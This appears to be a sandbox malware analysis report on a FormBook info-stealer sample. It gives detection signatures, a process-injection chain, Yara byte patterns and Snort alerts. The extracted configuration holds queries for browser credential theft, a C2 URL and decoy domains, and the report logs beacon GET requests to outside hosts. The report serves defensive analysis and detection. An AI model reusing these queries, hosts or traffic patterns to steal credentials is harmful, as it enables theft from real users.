Play interactive tour

Edit tour

Analysis Report 74852.exe

Overview

General Information

Sample Name:	74852.exe
Analysis ID:	339342
MD5:	e295cb54968cb6f3575a7caf32fe7f5a
SHA1:	84405250603351ebe538e7ae34812704c0c3f480
SHA256:	15198bfd2fbc367f07a22c6b39ea4e658dfea4a51b74cb4a653eb4b936ad3db0
Tags:	exeGoDaddy
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

System process connects to network (likely due to code injection or exploit)

Yara detected FormBook

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Tries to detect virtualization through RDTSC time measurements

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Startup

System is w10x64

74852.exe (PID: 4604 cmdline: 'C:\Users\user\Desktop\74852.exe' MD5: E295CB54968CB6F3575A7CAF32FE7F5A)

74852.exe (PID: 5884 cmdline: 'C:\Users\user\Desktop\74852.exe' MD5: E295CB54968CB6F3575A7CAF32FE7F5A)

explorer.exe (PID: 3292 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)

chkdsk.exe (PID: 5476 cmdline: C:\Windows\SysWOW64\chkdsk.exe MD5: 2D5A2497CB57C374B3AE3080FF9186FB)

cmd.exe (PID: 6200 cmdline: /c del 'C:\Users\user\Desktop\74852.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: FormBook

{"Config: ": ["CONFIG_PATTERNS 0x8bc6", "KEY1_OFFSET 0x1d6c4", "CONFIG SIZE : 0xf1", "CONFIG OFFSET 0x1d7bf", "URL SIZE : 32", "searching string pattern", "strings_offset 0x1c373", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0xc4fd7dc1", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d7013", "0x9f714f28", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad0121f8", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd01445", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0x21b17672", "0xbba64d93", "0x2f0ee0d8", "0x9cb95240", "0x28c21e3f", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xd45e157c", "0x4edd1210", "0x2b127ce0", "0xadc887b6", "0xf45a1c52", "0xc84869d7", "0x36dc1f04", "0x50c2a508", "0x3e88e8bf", "0x4b6374a6", "0x72a93198", "0x85426977", "0xea193e11", "0xea653007", "0xe297c9c", "0x65399e87", "0x23609e75", "0xb92e8a5a", "0xabc89476", "0xd989572f", "0x4536ab86", "0x3476afc1", "0xaf24a63b", "0x393b9ac8", "0x414a3c70", "0x487e77f4", "0xbee1bdf6", "0xc30c49a6", "0xcb591d7f", "0x5c4ee455", "0x7c81c71d", "0x11c6f95e", "--------------------------------------------------", "Decrypted Strings", "--------------------------------------------------", "USERNAME", "LOCALAPPDATA", "USERPROFILE", "APPDATA", "TEMP", "ProgramFiles", "CommonProgramFiles", "ALLUSERSPROFILE", "/c copy \"", "/c del \"", "\\Run", "\\Policies", "\\Explorer", "\\Registry\\User", "\\Registry\\Machine", "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", "Office\\15.0\\Outlook\\Profiles\\Outlook\\", " NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\", "\\SOFTWARE\\Mozilla\\Mozilla ", "\\Mozilla", "Username: ", "Password: ", "formSubmitURL", "usernameField", "encryptedUsername", "encryptedPassword", "\\logins.json", "\\signons.sqlite", "\\Microsoft\\Vault\\", "SELECT encryptedUsername, encryptedPassword, formSubmitURL FROM moz_logins", "\\Google\\Chrome\\User Data\\Default\\Login Data", "SELECT origin_url, username_value, password_value FROM logins", ".exe", ".com", ".scr", ".pif", ".cmd", ".bat", "ms", "win", "gdi", "mfc", "vga", "igfx", "user", "help", "config", "update", "regsvc", "chkdsk", "systray", "audiodg", "certmgr", "autochk", "taskhost", "colorcpl", "services", "IconCache", "ThumbCache", "Cookies", "SeDebugPrivilege", "SeShutdownPrivilege", "\\BaseNamedObjects", "config.php", "POST ", " HTTP/1.1", "", "Host: ", "", "Connection: close", "", "Content-Length: ", "", "Cache-Control: no-cache", "", "Origin: http://", "", "User-Agent: Mozilla Firefox/4.0", "", "Content-Type: application/x-www-form-urlencoded", "", "Accept: */*", "", "Referer: http://", "", "Accept-Language: en-US", "", "Accept-Encoding: gzip, deflate", "", "dat=", "f-start", "lcwiremsh.com", "aliyunpan.host", "asiareddot.com", "russcrim.com", "onewithnature.store", "mypilot.net", "bonniebythebeach.com", "euvinarede.com", "xdbw688.com", "carbuyerforcashmorgantown.com", "dianna-ploss.com", "jbsolb.com", "homemademoneymaker.com", "m9wa.com", "westgatepaintedmountain.com", "bobbiejcochran.com", "templated.net", "xn--kasvomaskitnetist-6qb.com", "alliancefinancialgroupusa.com", "deungmaru.com", "memorialinsg.com", "theministrytofreedom.com", "wildtentz.com", "speak-prestige.info", "jlwebex.com", "arslanevdenevenakliyat.com", "olearestaurntgrp.com", "woleriutx.com", "iomola.com", "ozdisplay.com", "the-lookout.store", "psm-gen.com", "fishbitedogtreats.com", "safekillindia.com", "ifeelthevoice.com", "freefireturner.com", "cordialiving.com", "creplushealthplans.com", "pciappky.com", "bodyhousegr.com", "loanprogram.net", "robertnhenry.com", "claautogroup.com", "eternylyze.com", "bahsegel65.com", "tvory.net", "jaquesxpress.com", "tradcade.com", "lysander-hamburg.com", "borokish.com", "chromehygiene.com", "bliss2me.com", "truthaboutnickgordon.com", "blue-line-coffee.com", "baidu4.net", "remotelokal.com", "nazisrus.com", "xindedb.com", "happy-property.com", "villagora.com", "b8glpk11.xyz", "wingateofhouston.com", "colregistry.com", "api2088.com", "f-end", "--------------------------------------------------", "Decrypted CnC URL", "--------------------------------------------------", "www.theproducersagent.com/nf3n/\u0000"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000001.00000002.286508911.0000000001360000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000001.00000002.286508911.0000000001360000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.286508911.0000000001360000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18419:$sqlite3step: 68 34 1C 7B E1 0x1852c:$sqlite3step: 68 34 1C 7B E1 0x18448:$sqlite3text: 68 38 2A 90 C5 0x1856d:$sqlite3text: 68 38 2A 90 C5 0x1845b:$sqlite3blob: 68 53 D8 7F 8C 0x18583:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.244620276.0000000002FA0000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.244620276.0000000002FA0000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.244620276.0000000002FA0000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18419:$sqlite3step: 68 34 1C 7B E1 0x1852c:$sqlite3step: 68 34 1C 7B E1 0x18448:$sqlite3text: 68 38 2A 90 C5 0x1856d:$sqlite3text: 68 38 2A 90 C5 0x1845b:$sqlite3blob: 68 53 D8 7F 8C 0x18583:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000002.286361146.0000000001330000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000001.00000002.286361146.0000000001330000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.286361146.0000000001330000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18419:$sqlite3step: 68 34 1C 7B E1 0x1852c:$sqlite3step: 68 34 1C 7B E1 0x18448:$sqlite3text: 68 38 2A 90 C5 0x1856d:$sqlite3text: 68 38 2A 90 C5 0x1845b:$sqlite3blob: 68 53 D8 7F 8C 0x18583:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000002.285724875.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000001.00000002.285724875.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.285724875.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18419:$sqlite3step: 68 34 1C 7B E1 0x1852c:$sqlite3step: 68 34 1C 7B E1 0x18448:$sqlite3text: 68 38 2A 90 C5 0x1856d:$sqlite3text: 68 38 2A 90 C5 0x1845b:$sqlite3blob: 68 53 D8 7F 8C 0x18583:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 7 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
1.2.74852.exe.400000.1.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
1.2.74852.exe.400000.1.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1a6f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1b6fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.2.74852.exe.400000.1.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17619:$sqlite3step: 68 34 1C 7B E1 0x1772c:$sqlite3step: 68 34 1C 7B E1 0x17648:$sqlite3text: 68 38 2A 90 C5 0x1776d:$sqlite3text: 68 38 2A 90 C5 0x1765b:$sqlite3blob: 68 53 D8 7F 8C 0x17783:$sqlite3blob: 68 53 D8 7F 8C
0.2.74852.exe.2fa0000.2.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0.2.74852.exe.2fa0000.2.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1a6f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1b6fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0.2.74852.exe.2fa0000.2.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17619:$sqlite3step: 68 34 1C 7B E1 0x1772c:$sqlite3step: 68 34 1C 7B E1 0x17648:$sqlite3text: 68 38 2A 90 C5 0x1776d:$sqlite3text: 68 38 2A 90 C5 0x1765b:$sqlite3blob: 68 53 D8 7F 8C 0x17783:$sqlite3blob: 68 53 D8 7F 8C
0.2.74852.exe.2fa0000.2.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0.2.74852.exe.2fa0000.2.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0.2.74852.exe.2fa0000.2.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18419:$sqlite3step: 68 34 1C 7B E1 0x1852c:$sqlite3step: 68 34 1C 7B E1 0x18448:$sqlite3text: 68 38 2A 90 C5 0x1856d:$sqlite3text: 68 38 2A 90 C5 0x1845b:$sqlite3blob: 68 53 D8 7F 8C 0x18583:$sqlite3blob: 68 53 D8 7F 8C
1.2.74852.exe.400000.1.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
1.2.74852.exe.400000.1.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.2.74852.exe.400000.1.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18419:$sqlite3step: 68 34 1C 7B E1 0x1852c:$sqlite3step: 68 34 1C 7B E1 0x18448:$sqlite3text: 68 38 2A 90 C5 0x1856d:$sqlite3text: 68 38 2A 90 C5 0x1845b:$sqlite3blob: 68 53 D8 7F 8C 0x18583:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 7 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus / Scanner detection for submitted sample

Show sources

Source: 74852.exe

Avira: detected

Found malware configuration

Show sources

Source: 0.2.74852.exe.2fa0000.2.unpack

Malware Configuration Extractor: FormBook {"Config: ": ["CONFIG_PATTERNS 0x8bc6", "KEY1_OFFSET 0x1d6c4", "CONFIG SIZE : 0xf1", "CONFIG OFFSET 0x1d7bf", "URL SIZE : 32", "searching string pattern", "strings_offset 0x1c373", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0xc4fd7dc1", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d7013", "0x9f714f28", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad0121f8", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd01445", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0x21b17672", "0xbba64d93", "0x2f0ee0d8", "0x9cb95240", "0x28c21e3f", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xd45e157c", "0x4edd1210", "0x2b127ce0", "0xadc887b6", "0xf45a1c52", "0xc84869d7", "0x36dc1f04",

Multi AV Scanner detection for submitted file

Show sources

Source: 74852.exe

ReversingLabs: Detection: 43%

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000001.00000002.286508911.0000000001360000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.244620276.0000000002FA0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.286361146.0000000001330000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.285724875.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 1.2.74852.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.74852.exe.2fa0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.74852.exe.2fa0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.74852.exe.400000.1.raw.unpack, type: UNPACKEDPE

Machine Learning detection for sample

Show sources

Source: 74852.exe

Joe Sandbox ML: detected

Source: 0.2.74852.exe.2fa0000.2.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.2.74852.exe.400000.1.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Source: 74852.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: 74852.exe

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: wntdll.pdbUGP source: 74852.exe, 00000000.00000003.239671965.000000001C660000.00000004.00000001.sdmp, 74852.exe, 00000001.00000002.287145563.000000000150F000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: 74852.exe

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49757 -> 35.242.183.249:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49757 -> 35.242.183.249:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49757 -> 35.242.183.249:80

Source: global traffic	HTTP traffic detected: GET /nf3n/?P6A=BWH4JYaT58lXsf+hwUDxH06dhaR/NFiLUxB8VjbVPAJsYgbKUu72S4XTqnjrUaFuA8KvggDN6w==&-ZS=W6O4IjSXA HTTP/1.1Host: www.pciappky.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /nf3n/?P6A=XF3ACZVZ0AFxpmcjv7zNQUKAsvnV4JVkDOgKKla4SX4XI6rXEfoV+gBXeaHQvMH/qTdtiOwxQg==&-ZS=W6O4IjSXA HTTP/1.1Host: www.borokish.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /nf3n/?P6A=bFr0arjPDc1B3fljAhhQU4NpKn/qi+N2lxsYOk/PDiFBsnuAdXLBpwrG8B0Izk+nd97PpVoHHg==&-ZS=W6O4IjSXA HTTP/1.1Host: www.wingateofhouston.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

